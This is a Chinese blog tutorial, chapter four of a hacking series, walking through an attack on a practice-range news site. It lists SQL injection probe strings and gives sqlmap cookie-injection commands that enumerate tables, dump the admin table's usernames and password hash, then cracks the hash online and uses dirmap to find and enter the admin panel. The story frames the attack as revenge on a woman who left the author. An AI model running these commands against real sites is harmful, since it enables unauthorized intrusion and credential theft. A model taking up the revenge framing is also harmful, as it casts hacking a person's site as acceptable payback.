第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台

**

目录

第一章 黑客学习路线梳理
第二章 让你的kali变得更好用
第三章 别惹程序员0.0~简单的web渗透拿到用户名密码
第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台
**
继上一篇文章 ([第三章 别惹程序员0.0~简单的web渗透拿到用户名密码),我们已经拿到了美人所创建网站的用户名密码,想着进一步攻击找到后台,却发现这个用户名密码权限很小,根本进入不到网站后台管理,但想想被抛弃的不爽,最终通过不断的信息搜索和探查,找到了一个旁站,或许会是一个新的突入点…

旁站链接:

http://kypt8004.ia.aqlab.cn/

在这里插入图片描述

一、信息探查

tips:打开链接后,是网站首页,但是像这种新闻类网站的漏洞多存在于更深层的新闻详情页,所以可以随便打开首页一个新闻,观察一下。

在这里插入图片描述

发现链接变成了带参的链接,连接后面拼接的内容(即问号后面的内容,链接中的问号多指带参传递)一般都会是get请求打开数据库的一把钥匙

在这里插入图片描述

所以可以分别尝试些下面的简单sql注入语句(写在链接中的问号后面),看看能不能拿到更多的信息。

id=1
name=admin
keyword=关键字
; and 1=1 and 1=2
and 0<>(select count(*) from *)
and 1=(select @@VERSION)--
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 

我是尝试到第三条sql注入语句,得到了个弹窗返回,这种一般表示网站对请求地址进行了WAF防护

敲黑板:WAF简单的理解就是网页上面的防火墙,感兴趣的看自行百度。

在这里插入图片描述

WAF防火墙一般只会拦截get、post请求,所以可以尝试下cookie注入

敲黑板:cookie简单理解就是浏览器对你请求行为的历史记录,他是无状态无连接的。而Cookie注入简单来说就是利用Cookie而发起的注入攻击,从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数据库的注入,只是表现形式上略有不同。

二、开始进行cookie注入

在这里插入图片描述

工具:sqlmap

环境:kali系统

  • 猜解表

    –cookie:指的是使用cookie进行注入,后面通过双引号添加引用参数(参数是请求头中的信息,比如这里就是链接中的 id=171)

    –tables:指的是猜解数据库中的所有信息表

    –level:指的是要进行测试的级别(1-5),默认为1, 等级越高,要采集的信息也就越多,而要猜解的时间也会越久

    –thread:指的是设置线程数量,最高是10

    –batch:指的是渗透过程中自动跳过需要手动输入的地方

    sqlmap -u http://kypt8004.ia.aqlab.cn/shownews.asp\? --cookie "id=171" --tables --level 2 --thread 10 --batch
    

    执行命令拿到了数据库的八个表
    在这里插入图片描述

  • 猜解表字段信息

    因为我们要进入到后台,以此来给美人一个教训,所以这里就需要更高权限的用户名密码,直接猜解admin表(极大部分情况下,用户名和密码都会存在这里,当然猜解后发现不对的话,只能一个个的试了)

    -T:指定要猜解的数据库信息表

    –column:指猜解表中所有的列,即字段

    sqlmap -u http://kypt8004.ia.aqlab.cn/shownews.asp\? --cookie "id=171" -T admin --column --level 2 --thread 10 --batch
    

    在这里插入图片描述

    可以看到上面成功的猜解出来数据库中admin表的字段信息,共有7列,即7个字段,其中很显然“user/username”是用户名字段,“password ”是密码字段

  • 猜解指定字段存储的内容

    上一步我们已经猜解到最有可能是用户名密码的字段(user、username、password),所以最后直接定位到这三个字段继续猜解。

    sqlmap -u http://kypt8004.ia.aqlab.cn/shownews.asp\? --cookie "id=171" -T admin -C user,username,password --dump --level 2 --thread 10 --batch
    

    在这里插入图片描述

    上图可以看到user、username都可以作用户名,他们都是admin,那么用户名就拿到了,可password字段一看就不是人能用的密码,加密了。。。

    那么网站程序内部一定是有着一个密码的加密和解密流程,直接用拿到的这个加密后的密码肯定会登录失败的。。。所以我们要对拿到的这个数据库密码进行解密。

    在这里插入图片描述

三、数据库密码解密

最快的方式是使用线上加密解密工具尝试下,如果不行的话,只能自己写解密脚本了

在线解密网站链接:https://www.cmd5.com/

在这里插入图片描述

解密的后的明文密码为"welcome"

四、侵入网站后台管理系统

在这里插入图片描述

用户名和密码我们都已经拿到了,是时候进入后台搞一搞,给美人个教训了~

工具:dirmap信息收集工具

环境:kali

kail不带dirmap,这是python里面的工具,所以需要安装下,安装教程链接(从第二部开始看就可以):https://www.bilibili.com/read/cv6981656/

  • dirmap扫描站点(需要cd进到dirmap目录),其中要扫描的链接就到“cn”即可,因为通过观察,该网站的所有链接目录都是在这个目录之下的。

    python3 dirmap.py -i http://kypt8004.ia.aqlab.cn/ -lcf 
    

    在这里插入图片描述

    从上面扫描的结果可以看到,最有可能的后台链接是红框中的,因为他最后是有个“login”嘛,复制下来打开看看!

    在这里插入图片描述

    试试我们上面猜解出来的用户名“admin”,密码“welcome”

    在这里插入图片描述

    这个后台有点丑,有点简陋0.0,毕竟攻击的是个靶场嘛,真实的后台管理系统我们可以操作的空间就很大了,简直说可以对网站的一切信息为所欲为~

    在这里插入图片描述

    毕设没思路看这里https://blog.csdn.net/Q893448322/article/details/107642349?spm=1001.2014.3001.5501

  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值